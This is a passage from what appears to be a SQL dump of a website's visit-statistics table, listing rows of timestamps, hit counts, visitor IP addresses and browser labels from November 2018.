54.36.149.99','other'),(329941,1541949347,1,1,0,0,'54.36.148.26','other'),(329942,1541949436,1,1,0,0,'54.36.149.96','other'),(329943,1541949605,1,1,0,0,'46.229.168.132','other'),(329944,1541949608,1,1,0,0,'46.229.168.140','other'),(329945,1541950113,1,1,0,0,'54.36.149.22','other'),(329946,1541950137,1,1,0,0,'66.249.73.29','chrome'),(329947,1541950139,3,3,0,0,'216.244.66.241','other'),(329948,1541950148,1,1,0,0,'66.249.73.30','chrome'),(329949,1541950246,1,1,0,0,'54.36.148.187','other'),(329950,1541950283,1,1,0,0,'66.249.65.213','chrome'),(329951,1541950285,1,1,0,0,'66.249.65.198','chrome'),(329952,1541950376,1,1,0,0,'54.36.149.83','other'),(329953,1541950441,1,1,0,0,'54.36.148.223','other'),(329954,1541950468,1,1,0,0,'54.36.148.86','other'),(329955,1541950498,1,1,0,0,'54.36.148.212','other'),(329956,1541950507,1,1,0,0,'46.229.168.142','other'),(329957,1541950527,1,1,0,0,'66.249.65.211','chrome'),(329958,1541950528,1,1,0,0,'66.249.65.196','chrome'),(329959,1541950881,1,1,0,0,'54.36.148.49','other'),(329960,1541950940,1,1,0,0,'91.221.154.92','chrome'),(329961,1541951047,1,1,0,0,'216.244.66.241','other'),(329962,1541951048,1,1,0,0,'54.36.148.20','other'),(329963,1541951614,1,1,0,0,'37.53.125.42','other'),(329964,1541951700,1,1,0,0,'46.229.168.145','other'),(329965,1541951702,1,1,0,0,'46.229.168.135','other'),(329966,1541951773,2,2,0,0,'66.249.73.28','chrome'),(329968,1541951811,1,1,0,0,'66.249.65.211','chrome'),(329969,1541951812,1,1,0,0,'66.249.65.198','chrome'),(329970,1541951842,2,2,0,0,'66.249.65.194','chrome'),(329971,1541951880,1,1,0,0,'66.249.73.1','chrome'),(329972,1541951886,1,1,0,0,'54.36.148.53','other'),(329973,1541951966,1,1,0,0,'95.163.255.117','other'),(329974,1541951971,1,1,0,0,'95.163.255.109','other'),(329975,1541952082,1,1,0,0,'46.229.168.139','other'),(329976,1541952086,1,1,0,0,'46.229.168.136','other'),(329977,1541952125,1,1,0,0,'54.36.148.201','other'),(329978,1541952277,1,1,0,0,'54.36.148.100','other'),(329979,1541952319,1,1,0,0,'8.29.198.27','other'),(329980,1541952372,2,2,0,0,'66.249.73.30','chrome'),(329981,1541952431,1,1,0,0,'54.36.148.55','other'),(329982,1541952595,1,1,0,0,'66.249.65.196','chrome'),(329983,1541952645,1,1,0,0,'54.36.149.78','other'),(329984,1541952731,1,1,0,0,'54.36.148.105','other'),(329985,1541952916,1,1,0,0,'54.36.148.70','other'),(329986,1541953125,1,1,0,0,'54.36.148.88','other'),(329987,1541953151,1,1,0,0,'54.36.148.107','other'),(329988,1541953164,1,1,0,0,'54.36.148.219','other'),(329989,1541953339,1,1,0,0,'54.36.149.96','other'),(329990,1541953371,3,3,0,0,'216.244.66.241','other'),(329991,1541953409,1,1,0,0,'54.36.148.85','other'),(329992,1541953501,1,1,0,0,'66.249.73.29','chrome'),(329993,1541953502,2,2,0,0,'66.249.73.31','chrome'),(329994,1541953619,1,1,0,0,'193.194.124.221','firefox'),(329995,1541953640,2,2,0,0,'98.143.159.174','chrome'),(329996,1541953847,1,1,0,0,'207.46.13.190','other'),(329997,1541953851,2,2,0,0,'157.55.39.152','other'),(329998,1541953854,1,1,0,0,'54.36.149.97','other'),(329999,1541953856,5,5,0,0,'207.46.13.117','other'),(330000,1541953996,1,1,0,0,'54.36.148.138','other'),(330001,1541954009,1,1,0,0,'8.29.198.25','other'),(330002,1541954059,1,1,0,0,'54.36.149.13','other'),(330003,1541954485,1,1,0,0,'8.29.198.27','other'),(330004,1541954541,1,1,0,0,'46.229.168.153','other'),(330005,1541954712,1,1,0,0,'46.229.168.130','other'),(330006,1541955140,1,1,0,0,'54.36.148.195','other'),(330007,1541955180,1,1,0,0,'54.36.148.80','other'),(330008,1541955217,2,2,0,0,'46.211.39.159','chrome'),(330009,1541955377,1,1,0,0,'66.249.65.194','chrome'),(330010,1541955784,1,1,0,0,'46.229.168.139','other'),(330011,1541955787,1,1,0,0,'46.229.168.147','other'),(330012,1541955850,1,1,0,0,'5.141.78.150','chrome'),(330013,1541955905,1,1,0,0,'46.229.168.133','other'),(330014,1541955939,1,1,0,0,'178.154.244.29','other'),(330015,1541955940,1,1,0,0,'178.154.244.11','other'),(330016,1541956321,1,1,0,0,'66.249.65.196','chrome'),(330017,1541956362,4,4,0,0,'216.244.66.241','other'),(330018,1541956371,1,1,0,0,'54.36.148.124','other'),(330019,1541956521,2,2,0,0,'37.53.125.42','other'),(330020,1541956639,1,1,0,0,'54.36.148.67','other'),(330021,1541956750,1,1,0,0,'54.36.149.58','other'),(330022,1541956824,1,1,0,0,'80.90.55.172','other'),(330023,1541956940,1,1,0,0,'66.249.65.194','chrome'),(330024,1541957071,1,1,0,0,'54.36.148.162','other'),(330025,1541957177,1,1,0,0,'54.36.149.107','other'),(330026,1541957190,1,1,0,0,'54.36.148.127','other'),(330027,1541957224,1,1,0,0,'54.36.149.11','other'),(330028,1541957228,1,1,0,0,'66.249.65.196','chrome'),(330029,1541957314,1,1,0,0,'54.36.149.48','other'),(330030,1541957359,1,1,0,0,'54.36.148.61','other'),(330031,1541957578,1,1,0,0,'46.229.168.134','other'),(330032,1541958073,1,1,0,0,'46.229.168.152','other'),(330033,1541958248,1,1,0,0,'54.36.149.95','other'),(330034,1541958252,1,1,0,0,'54.36.148.77','other'),(330035,1541958392,1,1,0,0,'54.36.148.223','other'),(330036,1541958685,1,1,0,0,'54.36.148.61','other'),(330037,1541958847,1,1,0,0,'54.36.149.22','other'),(330038,1541959015,1,1,0,0,'54.36.148.34','other'),(330039,1541959203,1,1,0,0,'66.249.65.213','chrome'),(330040,1541959204,1,1,0,0,'66.249.65.194','chrome'),(330041,1541959295,3,3,0,0,'216.244.66.241','other'),(330042,1541959327,1,1,0,0,'66.249.73.30','chrome'),(330043,1541959339,1,1,0,0,'54.36.148.150','other'),(330044,1541959623,1,1,0,0,'54.36.148.181','other'),(330045,1541959815,1,1,0,0,'54.36.148.47','other'),(330046,1541959862,1,1,0,0,'46.229.168.129','other'),(330047,1541960486,1,1,0,0,'66.249.65.213','chrome'),(330048,1541960487,1,1,0,0,'66.249.65.198','chrome'),(330049,1541960824,1,1,0,0,'66.249.73.30','chrome'),(330050,1541960825,1,1,0,0,'66.249.73.31','chrome'),(330051,1541960854,1,1,0,0,'46.229.168.133','other'),(330052,1541960857,1,1,0,0,'46.229.168.136','other'),(330053,1541961164,1,1,0,0,'54.36.148.239','other'),(330054,1541961452,1,1,0,0,'46.229.168.150','other'),(330055,1541961455,1,1,0,0,'46.229.168.147','other'),(330056,1541961541,1,1,0,0,'54.36.148.218','other'),(330057,1541961645,6,6,0,0,'216.244.66.241','other'),(330058,1541961657,1,1,0,0,'54.36.149.27','other'),(330059,1541961859,1,1,0,0,'54.36.148.153','other'),(330060,1541962054,1,1,0,0,'46.229.168.141','other'),(330061,1541962196,1,1,0,0,'54.36.149.26','other'),(330062,1541962209,1,1,0,0,'54.36.148.140','other'),(330063,1541962425,1,1,0,0,'54.36.148.20','other'),(330064,1541962453,1,1,0,0,'54.36.148.53','other'),(330065,1541962578,1,1,0,0,'54.36.148.235','other'),(330066,1541963182,1,1,0,0,'8.29.198.26','other'),(330067,1541963201,1,1,0,0,'66.249.65.198','chrome'),(330068,1541963629,1,1,0,0,'46.229.168.130','other'),(330069,1541964535,1,1,0,0,'54.36.149.105','other'),(330070,1541964620,1,1,0,0,'46.229.168.135','other'),(330071,1541964623,1,1,0,0,'46.229.168.138','other'),(330072,1541964633,1,1,0,0,'54.36.148.119','other'),(330073,1541964721,3,3,0,0,'216.244.66.241','other'),(330074,1541964726,1,1,0,0,'46.229.168.146','other'),(330075,1541964729,1,1,0,0,'46.229.168.142','other'),(330076,1541964839,2,2,0,0,'8.29.198.27','other'),(330077,1541965047,1,1,0,0,'46.229.168.130','other'),(330078,1541965102,1,1,0,0,'54.36.148.221','other'),(330079,1541965312,1,1,0,0,'54.36.148.219','other'),(330080,1541965500,1,1,0,0,'54.36.148.189','other'),(330081,1541965518,1,1,0,0,'54.36.148.159','other'),(330082,1541965803,1,1,0,0,'54.36.148.75','other'),(330083,1541965860,1,1,0,0,'54.36.148.162','other'),(330084,1541965942,1,1,0,0,'54.36.148.95','other'),(330085,1541966178,1,1,0,0,'54.36.148.22','other'),(330086,1541966310,1,1,0,0,'54.36.148.98','other'),(330087,1541966901,1,1,0,0,'207.46.13.156','other'),(330088,1541966950,1,1,0,0,'54.36.148.216','other'),(330089,1541967312,1,1,0,0,'207.46.13.190','other'),(330090,1541967379,1,1,0,0,'54.36.149.46','other'),(330091,1541967674,1,1,0,0,'216.244.66.241','other'),(330092,1541967844,1,1,0,0,'54.36.148.97','other'),(330093,1541967909,1,1,0,0,'46.229.168.153','other'),(330094,1541967911,1,1,0,0,'46.229.168.148','other'),(330095,1541968271,1,1,0,0,'66.249.73.28','chrome'),(330096,1541968272,1,1,0,0,'66.249.73.30','chrome'),(330097,1541968486,1,1,0,0,'66.249.65.194','chrome'),(330098,1541968624,1,1,0,0,'54.36.149.6','other'),(330099,1541968659,1,1,0,0,'54.36.148.120','other'),(330100,1541968731,1,1,0,0,'157.55.39.152','other'),(330101,1541968803,1,1,0,0,'54.36.149.52','other'),(330102,1541968812,1,1,0,0,'46.229.168.132','other'),(330103,1541968814,1,1,0,0,'46.229.168.134','other'),(330104,1541969015,1,1,0,0,'54.36.148.125','other'),(330105,1541969029,1,1,0,0,'54.36.148.198','other'),(330106,1541969321,1,1,0,0,'54.36.149.60','other'),(330107,1541969346,1,1,0,0,'95.163.255.92','other'),(330108,1541969348,1,1,0,0,'95.163.255.96','other'),(330109,1541969378,1,1,0,0,'54.36.149.88','other'),(330110,1541969418,1,1,0,0,'54.36.148.177','other'),(330111,1541969620,1,1,0,0,'54.36.148.250','other'),(330112,1541969749,3,3,0,0,'216.244.66.241','other'),(330113,1541969858,1,1,0,0,'54.36.148.166','other'),(330114,1541969870,1,1,0,0,'54.36.149.18','other'),(330115,1541970095,1,1,0,0,'54.36.148.142','other'),(330116,1541970184,1,1,0,0,'66.249.73.30','chrome'),(330117,1541970193,1,1,0,0,'54.36.148.66','other'),(330118,1541970493,1,1,0,0,'54.36.148.68','other'),(330119,1541970737,1,1,0,0,'54.36.148.218','other'),(330120,1541971589,1,1,0,0,'54.36.148.178','other'),(330121,1541972016,1,1,0,0,'54.36.148.208','other'),(330122,1541972081,1,1,0,0,'54.36.148.52','other'),(330123,1541972175,1,1,0,0,'54.36.148.223','other'),(330124,1541972366,1,1,0,0,'54.36.148.232','other'),(330125,1541972382,1,1,0,0,'37.73.96.57','chrome'),(330126,1541972437,1,1,0,0,'54.36.148.108','other'),(330127,1541972468,2,2,0,0,'216.244.66.241','other'),(330128,1541972477,1,1,0,0,'37.53.125.42','msie'),(330129,1541972597,1,1,0,0,'54.36.148.80','other'),(330130,1541972612,1,1,0,0,'54.36.149.106','other'),(330131,1541972618,1,1,0,0,'54.36.148.219','other'),(330132,1541973073,1,1,0,0,'54.36.149.91','other'),(330133,1541973297,1,1,0,0,'54.36.148.120','other'),(330134,1541973580,1,1,0,0,'54.36.149.22','other'),(330135,1541973648,1,1,0,0,'207.46.13.190','other'),(330136,1541973900,1,1,0,0,'54.36.148.94','other'),(330137,1541973944,1,1,0,0,'46.229.168.140','other'),(330138,1541973998,1,1,0,0,'46.229.168.151','other'),(330139,1541974001,1,1,0,0,'46.229.168.145','other'),(330140,1541974024,1,1,0,0,'8.29.198.27','other'),(330141,1541974039,1,1,0,0,'54.36.148.212','other'),(330142,1541974159,1,1,0,0,'54.36.149.14','other'),(330143,1541974328,1,1,0,0,'54.36.148.128','other'),(330144,1541974374,1,1,0,0,'54.36.148.241','other'),(330146,1541974413,1,1,0,0,'54.36.148.115','other'),(330147,1541974733,1,1,0,0,'54.36.148.185','other'),(330148,1541975101,1,1,0,0,'54.36.148.96','other'),(330149,1541975163,1,1,0,0,'54.36.149.88','other'),(330150,1541975673,2,2,0,0,'8.29.198.25','other'),(330151,1541975759,1,1,0,0,'54.36.149.17','other'),(330152,1541975902,2,2,0,0,'216.244.66.241','other'),(330153,1541976107,1,1,0,0,'54.36.148.132','other'),(330154,1541976323,1,1,0,0,'207.46.13.190','other'),(330155,1541976409,1,1,0,0,'95.163.255.96','other'),(330156,1541976413,1,1,0,0,'95.163.255.99','other'),(330157,1541976513,1,1,0,0,'54.36.149.101','other'),(330158,1541976772,1,1,0,0,'178.212.111.36','chrome'),(330159,1541976893,1,1,0,0,'54.36.149.12','other'),(330160,1541977282,1,1,0,0,'46.229.168.137','other'),(330161,1541977284,1,1,0,0,'46.229.168.152','other'),(330162,1541977558,1,1,0,0,'46.229.168.153','other'),(330163,1541977967,3,3,0,0,'216.244.66.241','other'),(330164,1541978805,1,1,0,0,'66.249.65.209','chrome'),(330165,1541978806,1,1,0,0,'66.249.65.194','chrome'),(330166,1541979022,2,2,0,0,'216.244.66.241','other'),(330167,1541979045,1,1,0,0,'54.36.148.21','other'),(330168,1541979352,2,2,0,0,'207.46.13.190','other'),(330169,1541979513,1,1,0,0,'54.36.148.112','other'),(330170,1541979695,1,1,0,0,'54.36.148.206','other'),(330171,1541979852,1,1,0,0,'54.36.149.86','other'),(330172,1541979866,1,1,0,0,'54.36.148.72','other'),(330173,1541979908,1,1,0,0,'54.36.148.214','other'),(330174,1541980012,1,1,0,0,'54.36.148.140','other'),(330175,1541980181,1,1,0,0,'66.249.65.198','chrome'),(330176,1541980348,1,1,0,0,'54.36.148.15','other'),(330177,1541980524,1,1,0,0,'62.205.134.182','other'),(330178,1541980683,1,1,0,0,'207.46.13.190','other'),(330179,1541980921,1,1,0,0,'46.229.168.143','other'),(330180,1541981045,1,1,0,0,'54.36.149.24','other'),(330181,1541981128,1,1,0,0,'207.46.13.117','other'),(330182,1541981340,2,2,0,0,'216.244.66.241','other'),(330183,1541981929,1,1,0,0,'54.36.148.95','other'),(330184,1541982057,1,1,0,0,'54.36.148.26','other'),(330185,1541982188,1,1,0,0,'54.36.148.141','other'),(330186,1541982446,1,0,1,0,'66.249.65.194',''),(330187,1541982483,1,1,0,0,'54.36.148.136','other'),(330188,1541982709,1,1,0,0,'66.249.65.194','chrome'),(330189,1541982802,1,0,1,0,'66.249.73.30',''),(330190,1541982910,1,1,0,0,'46.229.168.150','other'),(330191,1541982912,1,1,0,0,'46.229.168.129','other'),(330192,1541982975,1,1,0,0,'54.36.148.126','other'),(330193,1541983077,1,1,0,0,'54.36.148.148','other'),(330194,1541983093,2,2,0,0,'66.249.65.211','chrome'),(330196,1541983110,1,1,0,0,'66.249.65.196','chrome'),(330197,1541983122,1,1,0,0,'54.36.149.89','other'),(330198,1541983166,1,1,0,0,'54.36.149.21','other'),(330199,1541983210,1,1,0,0,'54.36.149.49','other'),(330200,1541983586,3,3,0,0,'66.249.73.30','chrome'),(330201,1541983595,1,1,0,0,'54.36.149.25','other'),(330202,1541983699,1,1,0,0,'207.46.13.156','other'),(330203,1541983833,1,1,0,0,'54.36.148.149','other'),(330204,1541984019,1,1,0,0,'54.36.148.146','other'),(330205,1541984069,1,1,0,0,'54.36.148.245','other'),(330206,1541984153,1,1,0,0,'54.36.148.84','other'),(330207,1541984384,1,1,0,0,'66.249.65.196','chrome'),(330208,1541984621,3,3,0,0,'216.244.66.241','other'),(330209,1541984868,1,1,0,0,'8.29.198.26','other'),(330210,1541984894,1,1,0,0,'66.249.73.29','chrome'),(330211,1541984910,1,1,0,0,'66.249.73.31','chrome'),(330212,1541984999,1,1,0,0,'66.249.65.211','chrome'),(330213,1541985000,1,1,0,0,'66.249.65.198','chrome'),(330214,1541985014,2,2,0,0,'66.249.65.209','chrome'),(330215,1541985015,2,2,0,0,'66.249.65.194','chrome'),(330216,1541985020,1,1,0,0,'54.36.149.21','other'),(330217,1541985270,1,1,0,0,'54.36.149.94','other'),(330218,1541985428,2,2,0,0,'207.46.13.156','other'),(330219,1541985490,1,1,0,0,'54.36.148.53','other'),(330220,1541985597,1,1,0,0,'54.36.148.205','other'),(330221,1541985721,1,1,0,0,'54.36.148.144','other'),(330222,1541985969,1,1,0,0,'54.36.148.180','other'),(330223,1541986270,1,1,0,0,'54.36.148.23','other'),(330224,1541986375,1,1,0,0,'66.249.73.31','chrome'),(330225,1541986456,1,1,0,0,'207.46.13.156','other'),(330226,1541986510,1,1,0,0,'8.29.198.25','other'),(330227,1541986535,1,1,0,0,'54.36.149.61','other'),(330228,1541986782,1,1,0,0,'54.36.148.219','other'),(330229,1541986994,1,1,0,0,'8.29.198.26','other'),(330230,1541987416,1,1,0,0,'54.36.148.135','other'),(330231,1541987428,1,1,0,0,'54.36.149.44','other'),(330232,1541987521,1,1,0,0,'54.36.148.170','other'),(330233,1541987551,1,1,0,0,'91.196.178.101','chrome'),(330234,1541987887,1,1,0,0,'54.36.149.33','other'),(330235,1541987896,1,1,0,0,'66.249.65.194','chrome'),(330236,1541988028,1,1,0,0,'216.244.66.241','other'),(330237,1541988270,1,1,0,0,'54.36.149.26','other'),(330238,1541988612,1,1,0,0,'54.36.148.46','other'),(330239,1541988752,1,1,0,0,'54.36.148.203','other'),(330240,1541989071,1,1,0,0,'54.36.148.81','other'),(330241,1541989266,1,1,0,0,'54.36.148.37','other'),(330242,1541989603,1,1,0,0,'46.229.168.147','other'),(330243,1541989618,1,1,0,0,'54.36.148.40','other'),(330244,1541989882,3,3,0,0,'66.249.65.211','chrome'),(330245,1541989883,4,4,0,0,'66.249.65.196','chrome'),(330246,1541989912,1,1,0,0,'54.36.149.27','other'),(330247,1541989957,1,1,0,0,'66.249.73.31','chrome'),(330248,1541990042,1,1,0,0,'54.36.149.87','other'),(330249,1541990049,1,1,0,0,'54.36.148.46','other'),(330250,1541990239,1,1,0,0,'54.36.149.101','other'),(330251,1541990479,1,1,0,0,'54.36.149.60','other'),(330252,1541990529,1,1,0,0,'54.36.148.67','other'),(330253,1541990571,4,4,0,0,'216.244.66.241','other'),(330254,1541990790,1,1,0,0,'54.36.148.245','other'),(330255,1541990927,2,2,0,0,'35.160.2.94','chrome'),(330256,1541990950,1,1,0,0,'54.36.148.82','other'),(330257,1541991149,1,1,0,0,'54.36.148.130','other'),(330258,1541991212,1,1,0,0,'66.249.65.213','chrome'),(330259,1541991213,1,1,0,0,'66.249.65.198','chrome'),(330260,1541991217,1,1,0,0,'66.249.65.211','chrome'),(330261,1541991218,1,1,0,0,'66.249.65.194','chrome'),(330262,1541991496,1,1,0,0,'207.46.13.190','other'),(330263,1541991776,1,1,0,0,'54.36.149.106','other'),(330264,1541992132,2,2,0,0,'66.249.65.194','chrome'),(330265,1541992398,1,1,0,0,'54.36.149.96','other'),(330266,1541992577,1,1,0,0,'54.36.148.67','other'),(330267,1541992764,1,1,0,0,'207.46.13.156','other'),(330268,1541992907,1,1,0,0,'54.36.148.229','other'),(330269,1541993111,5,5,0,0,'216.244.66.241','other'),(330270,1541993210,2,2,0,0,'95.163.255.94','other'),(330271,1541993291,1,1,0,0,'66.249.65.211','chrome'),(330272,1541993292,1,1,0,0,'66.249.65.198','chrome'),(330273,1541993317,1,1,0,0,'66.249.73.30','chrome'),(330274,1541993319,1,1,0,0,'66.249.73.31','chrome'),(330275,1541993546,1,1,0,0,'66.249.65.209','chrome'),(330276,1541993547,1,1,0,0,'66.249.65.196','chrome'),(330277,1541993574,1,1,0,0,'207.46.13.117','other'),(330278,1541994182,1,1,0,0,'54.36.148.78','other'),(330279,1541994212,1,1,0,0,'46.229.168.146','other'),(330280,1541994221,1,1,0,0,'54.36.149.54','other'),(330281,1541994232,1,1,0,0,'66.249.73.31','chrome'),(330282,1541994276,1,1,0,0,'54.36.148.63','other'),(330283,1541994433,1,1,0,0,'46.229.168.141','other'),(330284,1541994648,1,1,0,0,'54.36.148.202','other'),(330285,1541994779,1,1,0,0,'46.229.168.129','other'),(330286,1541994956,1,1,0,0,'54.36.148.188','other'),(330287,1541995075,1,1,0,0,'54.36.149.87','other'),(330288,1541995312,1,1,0,0,'54.36.148.211','other'),(330289,1541995589,1,1,0,0,'66.249.65.213','chrome'),(330290,1541995590,1,1,0,0,'66.249.65.198','chrome'),(330291,1541995708,1,1,0,0,'8.29.198.25','other'),(330292,1541995736,2,2,0,0,'216.244.66.241','other'),(330293,1541996710,1,1,0,0,'54.36.148.137','other'),(330294,1541996988,2,2,0,0,'216.244.66.241','other'),(330295,1541997132,1,1,0,0,'207.46.13.156','other'),(330296,1541997254,1,1,0,0,'46.229.168.146','other'),(330297,1541997333,1,1,0,0,'54.36.148.86','other'),(330298,1541997342,1,1,0,0,'8.29.198.27','other'),(330299,1541997839,1,1,0,0,'8.29.198.25','other'),(330300,1541997938,2,2,0,0,'216.244.66.241','other'),(330301,1541997969,1,1,0,0,'207.46.13.190','other'),(330302,1541998026,3,3,0,0,'66.249.65.196','chrome'),(330303,1541998301,2,2,0,0,'66.249.65.209','chrome'),(330304,1541998344,1,1,0,0,'46.229.168.129','other'),(330305,1541998349,1,1,0,0,'46.229.168.140','other'),(330306,1541998444,1,1,0,0,'54.36.148.119','other'),(330307,1541998450,1,1,0,0,'207.46.13.156','other'),(330308,1541998535,2,2,0,0,'66.249.65.211','chrome'),(330310,1541998645,1,1,0,0,'54.36.149.13','other'),(330311,1541998750,1,1,0,0,'54.36.148.38','other'),(330312,1541998874,1,1,0,0,'216.244.66.241','other'),(330313,1541998893,1,1,0,0,'46.229.168.143','other'),(330314,1541998937,1,1,0,0,'54.36.148.97','other'),(330315,1541999004,1,1,0,0,'54.36.148.45','other'),(330316,1541999055,1,1,0,0,'54.36.148.106','other'),(330317,1541999057,1,1,0,0,'66.249.65.198','chrome'),(330318,1541999133,1,1,0,0,'66.249.73.29','chrome'),(330319,1541999134,1,1,0,0,'66.249.73.30','chrome'),(330320,1541999327,1,1,0,0,'54.36.148.88','other'),(330321,1541999385,1,1,0,0,'54.36.148.213','other'),(330322,1541999560,1,1,0,0,'46.229.168.141','other'),(330323,1541999563,1,1,0,0,'46.229.168.149','other'),(330324,1541999908,1,1,0,0,'54.36.148.197','other'),(330325,1541999980,2,2,0,0,'66.249.65.213','chrome'),(330326,1542000004,2,2,0,0,'66.249.65.196','chrome'),(330327,1542000033,1,1,0,0,'54.36.148.72','other'),(330328,1542000100,1,1,0,0,'46.229.168.147','other'),(330329,1542000247,2,2,0,0,'66.249.65.211','chrome'),(330330,1542000269,3,3,0,0,'66.249.65.194','chrome'),(330331,1542000282,1,1,0,0,'66.249.65.209','chrome'),(330332,1542000317,1,1,0,0,'66.249.65.198','chrome'),(330333,1542000453,3,3,0,0,'216.244.66.241','other'),(330334,1542001418,1,1,0,0,'46.229.168.143','other'),(330335,1542001420,2,2,0,0,'91.209.11.236','other'),(330336,1542001543,1,1,0,0,'216.244.66.241','other'),(330337,1542001568,1,1,0,0,'54.36.148.235','other'),(330338,1542001687,1,1,0,0,'54.36.148.206','other'),(330339,1542001817,1,1,0,0,'66.249.65.198','chrome'),(330340,1542001921,1,1,0,0,'54.36.148.181','other'),(330341,1542002060,1,1,0,0,'176.14.37.74','msie'),(330342,1542002279,4,4,0,0,'66.249.65.194','chrome'),(330343,1542002290,1,1,0,0,'95.163.255.68','other'),(330344,1542002293,1,1,0,0,'95.163.255.64','other'),(330345,1542002662,2,2,0,0,'66.249.65.196','chrome'),(330346,1542002741,1,1,0,0,'54.36.149.24','other'),(330347,1542002844,1,1,0,0,'54.36.148.162','other'),(330348,1542002848,1,1,0,0,'54.36.148.100','other'),(330349,1542002885,1,1,0,0,'66.249.65.211','chrome'),(330350,1542003222,5,5,0,0,'216.244.66.241','other'),(330351,1542003756,1,1,0,0,'37.53.156.3','chrome'),(330352,1542003916,1,1,0,0,'54.36.148.97','other'),(330353,1542004116,1,1,0,0,'207.46.13.190','other'),(330354,1542004140,2,2,0,0,'66.249.65.211','chrome'),(330355,1542004141,1,1,0,0,'66.249.65.196','chrome'),(330356,1542004264,1,1,0,0,'54.36.149.27','other'),(330357,1542004526,1,1,0,0,'39.98.62.11','other'),(330358,1542004577,1,1,0,0,'54.36.149.42','other'),(330359,1542004817,1,1,0,0,'66.249.65.198','chrome'),(330360,1542005277,1,1,0,0,'54.36.149.27','other'),(330361,1542005292,1,1,0,0,'157.55.39.152','other'),(330362,1542005353,1,1,0,0,'207.46.13.117','other'),(330363,1542005364,1,1,0,0,'207.46.13.156','other'),(330364,1542005390,1,1,0,0,'66.249.65.194','chrome'),(330365,1542005413,5,5,0,0,'216.244.66.241','other'),(330366,1542005468,3,3,0,0,'91.196.178.169','chrome'),(330367,1542005791,2,2,0,0,'54.36.148.27','other'),(330368,1542005844,1,1,0,0,'54.36.149.7','other'),(330369,1542005898,1,1,0,0,'54.36.149.28','other'),(330370,1542006146,1,1,0,0,'54.36.148.119','other'),(330371,1542006231,1,1,0,0,'54.36.148.174','other'),(330372,1542006456,1,1,0,0,'216.244.66.241','other'),(330373,1542006529,1,1,0,0,'54.36.148.96','other'),(330374,1542006549,1,1,0,0,'8.29.198.26','other'),(330375,1542006835,1,1,0,0,'54.36.148.105','other'),(330376,1542007101,2,2,0,0,'130.180.219.2','chrome'),(330377,1542007133,1,1,0,0,'13.57.233.99','chrome'),(330378,1542007218,1,1,0,0,'46.229.168.143','other'),(330379,1542008024,1,1,0,0,'66.249.65.196','chrome'),(330380,1542008113,1,1,0,0,'207.46.13.190','other'),(330381,1542008173,1,1,0,0,'8.29.198.27','other'),(330382,1542008232,1,1,0,0,'66.249.65.198','chrome'),(330383,1542008509,4,4,0,0,'216.244.66.241','other'),(330384,1542008570,1,1,0,0,'46.229.168.152','other'),(330385,1542008573,1,1,0,0,'46.229.168.146','other'),(330386,1542008646,1,1,0,0,'66.249.65.213','chrome'),(330387,1542008647,1,1,0,0,'66.249.65.194','chrome'),(330388,1542008677,1,1,0,0,'8.29.198.26','other'),(330389,1542009177,1,1,0,0,'46.229.168.142','other'),(330390,1542009254,1,1,0,0,'37.53.156.3','chrome'),(330391,1542009318,1,1,0,0,'46.229.168.134','other'),(330392,1542009338,3,3,0,0,'91.196.178.72','chrome'),(330393,1542010243,1,1,0,0,'66.249.73.29','chrome'),(330394,1542010244,1,1,0,0,'66.249.73.30','chrome'),(330395,1542010465,2,2,0,0,'91.196.177.110','chrome'),(330396,1542010604,1,1,0,0,'66.249.65.198','chrome'),(330397,1542010767,10,10,0,0,'216.244.66.241','other'),(330398,1542010846,5,5,0,0,'54.165.59.7','other'),(330399,1542010998,1,1,0,0,'54.36.148.111','other'),(330400,1542011294,1,1,0,0,'178.158.234.168','other'),(330401,1542011462,1,1,0,0,'46.229.168.145','other'),(330402,1542011529,1,1,0,0,'54.36.148.215','other'),(330403,1542011545,1,1,0,0,'66.249.65.211','chrome'),(330404,1542011546,1,1,0,0,'66.249.65.198','chrome'),(330405,1542011609,2,2,0,0,'66.249.65.209','chrome'),(330406,1542011610,1,1,0,0,'66.249.65.196','chrome'),(330407,1542011636,1,1,0,0,'66.249.65.194','chrome'),(330408,1542011678,1,1,0,0,'54.36.148.47','other'),(330409,1542011729,1,1,0,0,'216.244.66.241','other'),(330410,1542011752,1,1,0,0,'54.36.149.51','other'),(330411,1542011757,1,1,0,0,'54.165.59.7','other'),(330412,1542012191,1,1,0,0,'146.185.185.122','chrome'),(330413,1542012391,1,1,0,0,'54.36.148.185','other'),(330414,1542012721,1,1,0,0,'54.36.149.48','other'),(330415,1542012747,2,2,0,0,'46.250.13.46','chrome'),(330416,1542013058,1,1,0,0,'146.185.157.240','chrome'),(330417,1542013264,1,1,0,0,'207.46.13.156','other'),(330418,1542013465,1,1,0,0,'54.36.148.184','other'),(330419,1542013508,2,2,0,0,'37.55.80.171','chrome'),(330420,1542013684,1,1,0,0,'66.249.65.211','chrome'),(330421,1542013685,1,1,0,0,'66.249.65.198','chrome'),(330422,1542013751,4,4,0,0,'216.244.66.241','other'),(330423,1542013849,3,3,0,0,'66.249.65.213','chrome'),(330425,1542013929,1,1,0,0,'66.249.65.194','chrome'),(330426,1542013934,1,1,0,0,'157.55.39.144','other'),(330427,1542013999,1,1,0,0,'66.249.65.196','chrome'),(330428,1542014335,2,2,0,0,'54.36.148.68','other'),(330429,1542014525,1,1,0,0,'95.163.255.95','other'),(330430,1542014528,1,1,0,0,'95.163.255.99','other'),(330431,1542014859,1,1,0,0,'54.36.148.49','other'),(330432,1542014974,1,1,0,0,'54.36.149.47','other'),(330434,1542015039,1,1,0,0,'54.36.148.60','other'),(330435,1542015071,1,1,0,0,'54.36.148.112','other'),(330436,1542015088,2,2,0,0,'66.249.65.196','chrome'),(330437,1542015162,1,1,0,0,'54.36.148.187','other'),(330438,1542015380,1,1,0,0,'193.200.212.54','chrome'),(330439,1542015382,2,2,0,0,'52.53.201.78','chrome'),(330440,1542015447,1,1,0,0,'54.36.148.81','other'),(330441,1542015624,1,1,0,0,'91.196.178.93','chrome'),(330442,1542015673,2,2,0,0,'66.249.65.209','chrome'),(330444,1542015708,1,1,0,0,'66.249.65.211','chrome'),(330445,1542015909,1,1,0,0,'66.249.65.198','chrome'),(330446,1542016122,3,3,0,0,'216.244.66.241','other'),(330447,1542016244,1,1,0,0,'91.196.178.37','chrome'),(330448,1542016320,1,1,0,0,'54.36.148.143','other'),(330449,1542016328,1,1,0,0,'54.36.148.205','other'),(330450,1542016483,2,2,0,0,'207.46.13.156','other'),(330451,1542016577,1,1,0,0,'54.36.148.226','other'),(330452,1542016683,1,1,0,0,'54.36.148.157','other'),(330453,1542016901,2,2,0,0,'66.249.65.198','chrome'),(330454,1542017015,1,1,0,0,'114.215.164.201','other'),(330455,1542017023,1,1,0,0,'194.246.74.89','